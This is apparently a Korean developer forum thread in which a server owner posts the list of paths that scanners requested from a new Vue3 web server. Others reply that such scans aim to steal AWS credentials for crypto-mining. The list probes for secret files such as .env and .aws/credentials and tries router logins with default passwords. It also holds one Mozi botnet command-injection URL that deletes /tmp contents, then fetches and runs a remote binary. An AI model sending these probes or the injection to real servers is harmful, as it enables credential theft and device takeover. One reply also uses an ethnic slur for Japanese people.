... 아니, 새로 도메인 파서 올라온 건데, 누가 이걸 알고 이렇게 날리는 거죠... 일단 웹서버로 가동중이거든요. vue3 돌립니다.
보내 봤자 우리 아는 패턴 빼놓고는 다 404로 답해드릴 뿐인데 말이죠.
웹의 대부분의 신호들은 그냥 의미 없는 것들인 걸까 하는 생각이 들었습니다. 자원 낭비들인 것도 같고요.
도대체 우리 서버에서 뭘 알고 싶은 걸까요. 거참.
혹시 모르니 curl로 패턴 다 넣어서, 의미 있는 자료가 뽑히나 테스트 해볼라구요.
/__Additional
/_static/.env
/.aws/config
/.aws/credentials
/.docker/.env
/.env
/.env_1
/.env_sample
/.env.%7B%7BDN%7D%7D
/.env.%7B%7BSD%7D%7D
/.env.backup
/.env.dev
/.env.example
/.env.local
/.env.php
/.env.prod
/.env.production.local
/.env.save
/.env.stage
/.env.test
/.env.www
/.git/config
/.git/HEAD
/ab2g
/ab2h
/actions-server/.env
/actuator/health
/admin-app/.env
/admin.asp
/admin.aspx
/admin.cfm
/admin.cgi
/admin.html
/admin.jhtml
/admin.jsa
/admin.jsp
/admin.php
/admin.pl
/admin.shtml
/admin/.env
/admin/info.php
/admin/phpinfo
/admin/phpinfo.php
/adminer/.env
/administrator/.env
/administrator/info.php
/administrator/phpinfo.php
/agora/.env
/alpha/.env
/anaconda/.env
/apache.php
/api/.env
/api/src/.env
/api/v0/id
/api/v1/time
/api/v1/timestamp
/api/v2/static/not.found
/apis/apps/v1/namespaces/kube-system/daemonsets
/app_dir/.env
/app/.env
/app/client/.env
/app/config/.env
/app/config/dev/.env
/app/frontend/.env
/apps/.env
/apps/client/.env
/Archipel/.env
/asset_img/.env
/assets/.env
/audio/.env
/aws/credentials
/awstats/.env
/back/.env
/backend/.env
/backend/src/.env
/backendfinaltest/.env
/backup/.env
/base_dir/.env
/base.asp
/base.aspx
/base.cfm
/base.cgi
/base.html
/base.inc
/base.jhtml
/base.jsa
/base.jsp
/base.php
/base.pl
/base.shtml
/basic-network/.env
/bgoldd/.env
/bitcoind/.env
/blankon/.env
/blob/.env
/blog/.env
/blue/.env
/boaform/admin/formLogin?username=adminisp&psd=adminisp
/boaform/admin/formLogin?username=ec8&psd=ec8
/bookchain-client/.env
/bootstrap/.env
/bucoffea/.env
/build/.env
/c/version.js
/cardea/backend/.env
/cdw-backend/.env
/cgi-bin/.env
/challenge/.env
/challenges/.env
/charts/liveObjects/.env
/chat-client/.env
/chiminey/.env
/client-app/.env
/client/.env
/client/src/.env
/ClientApp/.env
/clld_dir/.env
/collected_static/.env
/community/.env
/conf/.env
/config/.env
/config/getuser?index=0
/console/info.php
/console/phpinfo.php
/ContainerRegistry/.env
/content/.env
/core/.env
/core/app/.env
/core/Datavase/.env
/core/persistence/.env
/counterblockd/.env
/counterwallet/.env
/cp/.env
/credentials
/cron/.env
/cronlab/.env
/cryo_project/.env
/css/.env
/CSS/Miniweb.css
/custom/.env
/d/.env
/dashboard/info.php
/dashboard/phpinfo.php
/dashboard/test.php
/data/.env
/database/.env
/dataset/.env
/default.asp
/default.aspx
/default.cfm
/default.cgi
/default.html
/default.jhtml
/default.jsa
/default.jsp
/default.php
/default.pl
/default.shtml
/default/.env
/delivery/.env
/demo-app/.env
/demo/.env
/deploy/.env
/dev.php
/developerslv/.env
/development/.env
/directories/.env
/doc/.env
/docker/.env
/docs/.env
/docs/cplugError.html/
/dodoswap-client/.env
/dotfiles/.env
/download/.env
/downloads/.env
/e2e/.env
/e5jX
/en/.env
/engine/.env
/env/.env
/epa/scripts/win/nsepa_setup.exe
/example/.env
/export/.env
/fastlane/.env
/favicons/.env
/favs/.env
/fedex/.env
/fhir-api/.env
/files/.env
/fileserver/.env
/films/.env
/flu/403.html
/fm/.env
/font-icons/.env
/fonts/.env
/foo.php
/forum/info.php
/forum/phpinfo.php
/frontend/.env
/frontendfinaltest/.env
/ftp/.env
/ftpmaster/.env
/gbook.html
/GponForm/diag_Form?images/
/grems-api/.env
/grems-frontend/.env
/Hash/.env
/hasura/.env
/Helmetjs/.env
/hgs-static/.env
/higlass-website/.env
/home.asp
/home.aspx
/home.cfm
/home.cgi
/home.html
/home.jhtml
/home.jsa
/home.jsp
/home.php
/home.pl
/home.shtml
/home/.env
/horde/.env
/hotpot-app-frontend/.env
/htdocs/.env
/html/.env
/http/.env
/httpboot/.env
/i.php
/icon/.env
/icons/.env
/ikiwiki/.env
/image_data/.env
/Imagebord/.env
/images/.env
/img/.env
/in.php
/index.asp
/index.aspx
/index.cfm
/index.cgi
/index.jhtml
/index.jsa
/index.jsp
/index.php
/index.pl
/index.shtml
/index1.php
/indice.asp
/indice.aspx
/indice.cfm
/indice.cgi
/indice.html
/indice.jhtml
/indice.jsa
/indice.jsp
/indice.php
/indice.pl
/indice.shtml
/inf.php
/info.php
/info1.php
/info2.php
/info3.php
/info4.php
/infophp.php
/infophp/index.php
/infophp/testphp.php
/infos.php
/ini.php
/inicio.asp
/inicio.aspx
/inicio.cfm
/inicio.cgi
/inicio.html
/inicio.jhtml
/inicio.jsa
/inicio.jsp
/inicio.php
/inicio.pl
/inicio.shtml
/install/.env
/items/.env
/javascript/.env
/js-plugin/.env
/js/.env
/json/
/jsrelay/.env
/jupyter/.env
/khanlinks/.env
/kibana/.env
/kodenames-server/.env
/kolab-syncroton/.env
/Kubernetes/.env
/lab/.env
/laravel/.env
/latest/.env
/layout/.env
/leafer-app/.env
/ledger_sync/.env
/lemonldap-ng-doc/.env
/lemonldap-ng-fr-doc/.env
/letsencrypt/.env
/lib/.env
/Library/.env
/libs/.env
/linear-swap-ex/market/depth?contract_code=BTC-USDT&type=step0
/linear-swap-ws
/linux/.env
/local/.env
/localstart.asp
/localstart.aspx
/localstart.cfm
/localstart.cgi
/localstart.html
/localstart.jhtml
/localstart.jsa
/localstart.jsp
/localstart.php
/localstart.pl
/localstart.shtml
/log/.env
/logging/.env
/login/.env
/mail/.env
/mailinabox/.env
/mailman/.env
/main_user/.env
/main.asp
/main.aspx
/main.cfm
/main.cgi
/main.html
/main.jhtml
/main.jsa
/main.jsp
/main.php
/main.pl
/main.shtml
/main/.env
/manual/.env
/master/.env
/media/.env
/memcached/.env
/menu.asp
/menu.aspx
/menu.cfm
/menu.cgi
/menu.html
/menu.jhtml
/menu.jsa
/menu.jsp
/menu.php
/menu.pl
/menu.shtml
/metrics
/micro-app-react/.env
/minified/.env
/misc/.env
/Modix/ClientApp/.env
/monerod/.env
/moodledata/.env
/msks/.env
/munki_repo/.env
/music/.env
/name/.env
/new-js/.env
/news-app/.env
/nginx-server/.env
/nginx/.env
/niffler-frontend/.env
/Nmap/folder/check1677652215
/nmaplowercheck1677652215
/NmapUpperCheck1677652215
/node_modules/.env
/noVNC/.env
/o.php
/oldsanta/.env
/ops/vagrant/.env
/option/.env
/orientdb-client/.env
/outputs/.env
/owa/auth/logon.aspx
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/owncloud/.env
/p.php
/php_info.php
/php-info.php
/php.ini
/php.php
/php/phpinfo.php
/php1.php
/phpinfo
/phpinfo.html
/phpinfo.php
/phpinfo.txt
/phpinfo/info.php
/phpinfo/phpinfo.php
/phpinfo1.php
/phpinfo2.php
/phpinfo3.php
/phpinfos.php
/phptest.php
/pinfo.php
/Portal/Portal.mwsl
/Portal0000.htm
/readme.txt
/ReportServer
/rest.php
/robots.txt
/root/info.php
/root/phpinfo.php
/scripts/index.php
/scripts/info.php
/scripts/phpinfo.php
/scripts/WPnBr.dll
/sdk
/setting_departmentxxx
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
/sitemap.xml
/stalker_portal/c/version.js
/start.asp
/start.aspx
/start.cfm
/start.cgi
/start.html
/start.jhtml
/start.jsa
/start.jsp
/start.php
/start.pl
/start.shtml
/stream?streams=btcusdt@depth
/stream/live.php
/streaming/clients_live.php
/system_api.php
/t4
/temp.php
/test.php
/test1.php
/test2.php
/test3.php
/test4.php
/testphp.php
/token.php
/v2/
/web/.env
/ws-api/v3
저런 식으로 해서 AWS credential 탈취해서.. GPU 인스턴스 만들어서 채굴합니다.. ㄷㄷㄷ
당사자는 요금 폭탄 맞구요..
그거 소홀히 하다 생기는 사고는 아마존이 책임지지 않습니다. 원칙적으로는요... ^^
/일본 왜노자
개발자 리소스 접근 권한 한정 이야기죠. 해킹의 주목적이 AWS 리소스 털어먹기라서요.
집에 NAS돌려도 엄청 시도가 들어옵니다. ㅎㅎㅎ